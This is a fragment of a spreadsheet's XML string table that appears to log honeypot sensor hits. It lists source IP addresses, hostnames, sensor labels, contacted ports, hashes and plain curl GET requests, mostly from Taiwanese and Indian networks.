    <t>114.34.30.130</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-34-30-130.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;9100&amp;&amp;60319</t>
  </si>
  <si>
    <t>::ffff:7222:1e82</t>
  </si>
  <si>
    <t>6ba886714d942bdab37b0e50a09fb9ed</t>
  </si>
  <si>
    <t>223.184.0.95</t>
  </si>
  <si>
    <t>Bharti Cellular limited</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (223.184.0.95,52670)}&amp;&amp;{Data_SMB:Incoming connection (223.184.0.95,53317)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:dfb8:5f</t>
  </si>
  <si>
    <t>971548b877210f0b2c8fce9523481aeb</t>
  </si>
  <si>
    <t>122.116.158.160</t>
  </si>
  <si>
    <t>122-116-158-160.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_DNS_H30&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;22589&amp;&amp;23&amp;&amp;9100&amp;&amp;64897</t>
  </si>
  <si>
    <t>24.9561</t>
  </si>
  <si>
    <t>121.351</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a74:9ea0</t>
  </si>
  <si>
    <t>17077989573e8c224504040bdc0763fa</t>
  </si>
  <si>
    <t>49.213.182.149</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H38&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;29961&amp;&amp;23&amp;&amp;61478&amp;&amp;45405&amp;&amp;NA&amp;&amp;53461&amp;&amp;55319&amp;&amp;42566&amp;&amp;80</t>
  </si>
  <si>
    <t>::ffff:31d5:b695</t>
  </si>
  <si>
    <t>59e2a2f92a991e78ca333bfd5637198a</t>
  </si>
  <si>
    <t>182.57.239.62</t>
  </si>
  <si>
    <t>::ffff:b639:ef3e</t>
  </si>
  <si>
    <t>580b76156177c16922d7a8b09596a629</t>
  </si>
  <si>
    <t>59.126.151.165</t>
  </si>
  <si>
    <t>59-126-151-165.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H1&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;17742&amp;&amp;23&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:97a5</t>
  </si>
  <si>
    <t>2bd579977bec84da4dc05dfc588c0ca1</t>
  </si>
  <si>
    <t>117.206.139.148</t>
  </si>
  <si>
    <t>::ffff:75ce:8b94</t>
  </si>
  <si>
    <t>1dd6783ec255ec2c5bbfac76262b526c</t>
  </si>
  <si>
    <t>220.132.157.172</t>
  </si>
  <si>
    <t>220-132-157-172.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;34022&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc84:9dac</t>
  </si>
  <si>
    <t>a74f7699aea4062169af3c45b88669ce</t>
  </si>
  <si>
    <t>61.0.87.15</t>
  </si>
  <si>
    <t>::ffff:3d00:570f</t>
  </si>
  <si>
    <t>9e5f65793f2d9dc2ab5ee404fbad3831</t>
  </si>
  <si>
    <t>220.134.57.61</t>
  </si>
  <si>
    <t>220-134-57-61.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;9100&amp;&amp;NA&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:393d</t>
  </si>
  <si>
    <t>1bcf3d280cb4101bcec83a9d036a3a03</t>
  </si>
  <si>
    <t>125.229.89.163</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-89-163.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100&amp;&amp;47483</t>
  </si>
  <si>
    <t>::ffff:7de5:59a3</t>
  </si>
  <si>
    <t>d6c38ae21c315d696bdf4e6d5992f20f</t>
  </si>
  <si>
    <t>117.208.227.164</t>
  </si>
  <si>
    <t>::ffff:75d0:e3a4</t>
  </si>
  <si>
    <t>d17d41d4dd97d6a8fe171fde6336db8a</t>
  </si>
  <si>
    <t>117.251.53.64</t>
  </si>
  <si>
    <t>::ffff:75fb:3540</t>
  </si>
  <si>
    <t>05e04a5e49426fa2f71491ad04d2dcdc</t>
  </si>
  <si>
    <t>218.161.30.145</t>
  </si>
  <si>
    <t>218-161-30-145.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;62519&amp;&amp;23&amp;&amp;80&amp;&amp;64874&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:daa1:1e91</t>
  </si>
  <si>
    <t>236d6cd3430f5ed9aa0754e166e994c7</t>
  </si>
  <si>
    <t>125.228.61.250</t>
  </si>
  <si>
    <t>125-228-61-250.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:3dfa</t>
  </si>
  <si>
    <t>080a83aad94d7aff45d14fb058fc361e</t>
  </si>
  <si>
    <t>125.228.180.10</t>
  </si>
  <si>
    <t>125-228-180-10.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_DNS_H38&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;53&amp;&amp;20505&amp;&amp;23&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:b40a</t>
  </si>
  <si>
    <t>b99958bf20c528b9fa5a7b2e14c1fe27</t>
  </si>
  <si>
    <t>59.125.60.224</t>
  </si>
  <si>
    <t>59-125-60-224.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;445&amp;&amp;9100&amp;&amp;443&amp;&amp;22&amp;&amp;22396&amp;&amp;31846</t>
  </si>
  <si>
    <t>Buzi</t>
  </si>
  <si>
    <t>1670264</t>
  </si>
  <si>
    <t>24.2101</t>
  </si>
  <si>
    <t>120.573</t>
  </si>
  <si>
    <t>::ffff:3b7d:3ce0</t>
  </si>
  <si>
    <t>73064be07487c48f0139323406639d71</t>
  </si>
  <si>
    <t>220.135.149.27</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-135-149-27.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>::ffff:dc87:951b</t>
  </si>
  <si>
    <t>a9c086ae8bf8854df8fb3de5417ecb1c</t>
  </si>
  <si>
    <t>85.51.255.147</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>VC</t>
  </si>
  <si>
    <t>Valencia</t>
  </si>
  <si>
    <t>Alicante</t>
  </si>
  <si>
    <t>Cañada</t>
  </si>
  <si>
    <t>2520397</t>
  </si>
  <si>
    <t>03409</t>
  </si>
  <si>
    <t>38.6739</t>
  </si>
  <si>
    <t>-0.8133</t>
  </si>
  <si>
    <t>UNI2</t>
  </si>
  <si>
    <t>2004-09-07</t>
  </si>
  <si>
    <t>::ffff:5533:ff93</t>
  </si>
  <si>
    <t>0b2c3cb4696f2a8fbf2da3cfd2586011</t>
  </si>
  <si>
    <t>220.133.67.138</t>
  </si>
  <si>
    <t>220-133-67-138.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;47476&amp;&amp;80&amp;&amp;NA&amp;&amp;60586&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc85:438a</t>
  </si>
  <si>
    <t>7d17726aee0abf77eaf651a4fc618521</t>
  </si>
  <si>
    <t>220.133.40.168</t>
  </si>
  <si>
    <t>220-133-40-168.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
